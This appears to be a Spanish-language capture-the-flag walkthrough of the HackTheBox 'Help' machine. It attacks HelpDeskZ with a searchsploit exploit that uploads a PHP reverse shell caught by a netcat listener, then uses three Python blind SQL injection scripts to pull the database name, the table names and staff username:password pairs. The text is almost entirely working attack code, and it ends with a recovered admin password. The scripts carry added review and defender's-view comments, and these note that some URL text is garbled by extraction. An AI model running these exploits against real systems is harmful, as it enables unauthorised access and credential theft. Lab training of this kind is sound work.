HelpDeskZ
Versión:
http://help.htb/support/readme.html
RCE sin autenticar
searchsploit HelpDeskZ
~/.pyenv/versions/2.7.18/bin/python 40300.py http://help.htb/support/uploads/tickets/ rev_shell.php
nc -lvnp 4444
SQLi autenticado
Extraer nombre de la base de datos
#!/usr/bin/env python3
from pwn import *
import requests, sys, signal, time, pdb, urllib3
from urllib.parse import quote
def sig_handler(sig, frame):
    """Handle SIGINT (Ctrl-C): print a farewell line and exit with status 1.

    Installed below via ``signal.signal``; ``sig`` and ``frame`` are the
    arguments the signal machinery supplies and are not used.
    """
    farewell = "\n\n[!] Saliendo...\n"
    print(farewell)
    sys.exit(1)
# Route Ctrl-C to sig_handler so the brute-force loop can be aborted cleanly.
signal.signal(signal.SIGINT, sig_handler)

# Global variables
# Alphabet tried at every character position (26 + 26 + 10 + 1 = 63 symbols).
# `string` is never imported explicitly here; it arrives via `from pwn import *`.
characters= string.ascii_lowercase + string.ascii_uppercase + string.digits + '_'
# Page-specific, URL-encoded `usrhash` session cookie. Presumably captured from
# an authenticated HelpDeskZ session (the heading above calls this the
# authenticated SQLi) and valid only for that session — TODO confirm.
Cookie= {"usrhash":"0Nwx5jIdx%2BP2QcbUIv9qck4Tk2feEu8Z0J7rPe0d70BtNMpqfrbvecJupGimitjg3JjP1UzkqYH6QdYSl1tVZNcjd4B7yFeh6KDrQQ%2FiYFsjV6wVnLIF%2FaNh6SC24eT5OqECJlQEv7G47Kd65yVLoZ06smnKha9AGF4yL2Ylo%2BE3IrjgqzGu%2BU2KAyaJPiVy97oC5vrSOyyszlYc1LNlNw%3D%3D"}
# Defined but never passed to `s.get()` in makeSQLI, so the requests are NOT
# routed through this local proxy.
proxies = {"http": "http://127.0.0.1:8080"}
def makeSQLI():
    """Recover the current database name one character at a time.

    Boolean-based blind technique: each request appends a predicate to the
    ticket-attachment query string and the response body is checked for the
    word "helpdesk"; its absence is read as "predicate true". Everything
    happens over the network against help.htb; nothing is returned and the
    result is only shown through pwntools ``log.progress`` bars.

    Defender's view: the same endpoint receives a tight burst of requests
    (up to 63 per character position here) whose query string carries
    ``substr((select database())`` — a clear detection signal — and the
    root-cause fix is parameterizing the query behind this parameter.
    """
    s=requests.session()
    # No effect for the plain-http URL below; would only matter over https.
    s.verify = False
    p1= log.progress("Fuerza Bruta")
    p1.status("Iniciando proceso de fuerza bruta")
    # Appears to be a purely cosmetic pause before the loop starts.
    time.sleep(2)
    p2= log.progress("Database")
    database= ""
    # The length (7) is hard-coded, not detected: a shorter name simply stops
    # growing (no character matches past its end); a longer one is truncated.
    for position in range(1,8): # range 1 .. (database name length + 1)
        for character in characters:
            payload = f" AND ((substr((select database()),{position},1))='{character}') -- -"
            p1.status(payload)
            # NOTE(review): `¶m[]` appears to be an extraction artifact of this
            # copy — confirm the query-string keys against the original script.
            url= "http://help.htb/support/?v=view_tickets&action=ticket¶m[]=4¶m[]=attachment¶m[]=1¶m[]=6" + payload
            # Percent-encode the payload while keeping the URL's own delimiters.
            url = quote(url, safe=':/?&=.,')
            # Module-level `proxies` is not passed, so this does not go through
            # the local proxy; redirects are not followed, so only the first
            # response body feeds the oracle.
            r = s.get(url,cookies=Cookie,allow_redirects=False)
            # Oracle: the normal page contains "helpdesk"; its absence means the
            # injected condition held for this character at this position.
            if not "helpdesk" in r.text:
                database += character
                p2.status(database)
                break
# Script entry point; the whole run is network-bound (see makeSQLI).
if __name__ == '__main__':
    makeSQLI()
Extraer nombres de las tablas
#!/usr/bin/env python3
from pwn import *
import requests, sys, signal, time, pdb, urllib3
from urllib.parse import quote
def sig_handler(sig, frame):
    """Handle SIGINT (Ctrl-C): print a farewell line and exit with status 1.

    Installed below via ``signal.signal``; ``sig`` and ``frame`` are the
    arguments the signal machinery supplies and are not used.
    """
    farewell = "\n\n[!] Saliendo...\n"
    print(farewell)
    sys.exit(1)
# Route Ctrl-C to sig_handler so the brute-force loop can be aborted cleanly.
signal.signal(signal.SIGINT, sig_handler)

# Global variables
# Alphabet tried at every character position (26 + 26 + 10 + 1 = 63 symbols);
# `len(characters)` is also the stop threshold used inside makeSQLI.
# `string` is never imported explicitly here; it arrives via `from pwn import *`.
characters= string.ascii_lowercase + string.ascii_uppercase + string.digits + '_'
# Page-specific, URL-encoded `usrhash` session cookie. Presumably captured from
# an authenticated HelpDeskZ session and valid only for that session — TODO confirm.
Cookie= {"usrhash":"0Nwx5jIdx%2BP2QcbUIv9qck4Tk2feEu8Z0J7rPe0d70BtNMpqfrbvecJupGimitjg3JjP1UzkqYH6QdYSl1tVZNcjd4B7yFeh6KDrQQ%2FiYFsjV6wVnLIF%2FaNh6SC24eT5OqECJlQEv7G47Kd65yVLoZ06smnKha9AGF4yL2Ylo%2BE3IrjgqzGu%2BU2KAyaJPiVy97oC5vrSOyyszlYc1LNlNw%3D%3D"}
# Defined but never passed to `s.get()` in makeSQLI, so the requests are NOT
# routed through this local proxy.
proxies = {"http": "http://127.0.0.1:8080"}
def makeSQLI():
    """Enumerate table names of the current database, one character at a time.

    Same boolean-based blind oracle as the database-name script (absence of
    "helpdesk" in the body means the predicate held), now driven by
    ``information_schema.tables ... limit {table},1`` for up to five tables of
    at most 14 characters each — both bounds are hard-coded. Network-bound;
    returns nothing, results are shown via pwntools ``log.progress``.

    NOTE(review): indentation was lost in this copy, so the nesting of the
    ``else`` / ``numChars`` block below is reconstructed. As reconstructed,
    ``numChars`` is never reset, so the early exit fires once after 63
    cumulative misses and only leaves the character loop — it does not stop
    at the end of a table name. Confirm against the original.

    Defender's view: repeated requests to one endpoint carrying
    ``information_schema.tables`` in the query string are the signal to
    alert on; parameterizing the underlying query removes the oracle.
    """
    s=requests.session()
    # No effect for the plain-http URL below; would only matter over https.
    s.verify = False
    p1= log.progress("Fuerza Bruta")
    p1.status("Iniciando proceso de fuerza bruta")
    # Appears to be a purely cosmetic pause before the loop starts.
    time.sleep(2)
    # Cumulative count of non-matching characters across ALL positions/tables.
    numChars = 0
    p2= log.progress("Tables")
    table_name= ""
    for table in range(0,5):
        # Comment copied from the database script; here the bound is the
        # table-name length: range 1 .. (length + 1)
        for position in range(1,15): # range 1 - (database size + 1)
            for character in characters:
                payload = f" AND (substr((select table_name from information_schema.tables where table_schema=database() limit {table},1) ,{position},1)='{character}') -- -"
                p1.status(payload)
                # NOTE(review): `¶m[]` appears to be an extraction artifact of
                # this copy — confirm the query-string keys against the original.
                url= "http://help.htb/support/?v=view_tickets&action=ticket¶m[]=4¶m[]=attachment¶m[]=1¶m[]=6" + payload
                # Percent-encode the payload while keeping the URL's own delimiters.
                url = quote(url, safe=':/?&=.,')
                # Module-level `proxies` is not passed; redirects are not followed.
                r = s.get(url,cookies=Cookie,allow_redirects=False)
                # Oracle: absence of "helpdesk" means the condition held.
                if not "helpdesk" in r.text:
                    table_name += character
                    p2.status(table_name)
                    break
                else:
                    numChars+= 1
                    # See the NOTE in the docstring about this stop condition.
                    if numChars == len(characters):
                        break
        # Separator between consecutive table names in the progress line.
        table_name += ", "
# Script entry point; the whole run is network-bound (see makeSQLI).
if __name__ == '__main__':
    makeSQLI()
Extraer contenido
#!/usr/bin/env python3
from pwn import *
import requests, sys, signal, time, pdb, urllib3
from urllib.parse import quote
def sig_handler(sig, frame):
    """Handle SIGINT (Ctrl-C): print a farewell line and exit with status 1.

    Installed below via ``signal.signal``; ``sig`` and ``frame`` are the
    arguments the signal machinery supplies and are not used.
    """
    farewell = "\n\n[!] Saliendo...\n"
    print(farewell)
    sys.exit(1)
# Route Ctrl-C to sig_handler so the brute-force loop can be aborted cleanly.
signal.signal(signal.SIGINT, sig_handler)

# Global variables
# Alphabet tried at every character position. ':' is added because the query
# in makeSQLI joins username and password with 0x3A (':').
# `string` is never imported explicitly here; it arrives via `from pwn import *`.
characters= string.ascii_lowercase + string.ascii_uppercase + string.digits + '_' + ':'
# Page-specific, URL-encoded `usrhash` session cookie. Presumably captured from
# an authenticated HelpDeskZ session and valid only for that session — TODO confirm.
Cookie= {"usrhash":"0Nwx5jIdx%2BP2QcbUIv9qck4Tk2feEu8Z0J7rPe0d70BtNMpqfrbvecJupGimitjg3JjP1UzkqYH6QdYSl1tVZNcjd4B7yFeh6KDrQQ%2FiYFsjV6wVnLIF%2FaNh6SC24eT5OqECJlQEv7G47Kd65yVLoZ06smnKha9AGF4yL2Ylo%2BE3IrjgqzGu%2BU2KAyaJPiVy97oC5vrSOyyszlYc1LNlNw%3D%3D"}
# Defined but never passed to `s.get()` in makeSQLI, so the requests are NOT
# routed through this local proxy.
proxies = {"http": "http://127.0.0.1:8080"}
def makeSQLI():
    """Extract ``username:password`` pairs from the ``staff`` table, one character at a time.

    Same boolean-based blind oracle as the earlier scripts (absence of
    "helpdesk" in the body means the predicate held), applied to
    ``group_concat(username,0x3A,password)`` for up to 49 characters — the
    bound is hard-coded, so longer output is truncated. Network-bound;
    returns nothing, the running result is shown via pwntools ``log.progress``.

    Defender's view: this is credential material leaving through a
    character-by-character oracle; the request rate and the recurring
    ``from staff`` in the query string are the detection signal. Whether
    ``staff.password`` holds a hash or a usable cleartext value cannot be
    told from here — TODO confirm, as it is a separate finding either way.
    """
    s=requests.session()
    # No effect for the plain-http URL below; would only matter over https.
    s.verify = False
    p1= log.progress("Fuerza Bruta")
    p1.status("Iniciando proceso de fuerza bruta")
    # Appears to be a purely cosmetic pause before the loop starts.
    time.sleep(2)
    p2= log.progress("Data")
    data= ""
    # Comment copied from the database script; here the bound is the length of
    # the concatenated output: range 1 .. (length + 1)
    for position in range(1,50): # range 1 - (database size + 1)
        for character in characters:
            payload = f" AND (substr((select group_concat(username,0x3A,password) from staff) ,{position},1)='{character}') -- -"
            p1.status(payload)
            # NOTE(review): `¶m[]` appears to be an extraction artifact of this
            # copy — confirm the query-string keys against the original script.
            url= "http://help.htb/support/?v=view_tickets&action=ticket¶m[]=4¶m[]=attachment¶m[]=1¶m[]=6" + payload
            # Percent-encode the payload while keeping the URL's own delimiters.
            url = quote(url, safe=':/?&=.,')
            # Module-level `proxies` is not passed; redirects are not followed.
            r = s.get(url,cookies=Cookie,allow_redirects=False)
            # Oracle: absence of "helpdesk" means the condition held.
            if not "helpdesk" in r.text:
                data += character
                p2.status(data)
                break
    # Appended once after the loop; appears to be a leftover from the
    # table-enumeration script rather than a meaningful separator.
    data += ", "
# Script entry point; the whole run is network-bound (see makeSQLI).
if __name__ == '__main__':
    makeSQLI()
admin \ Welcome1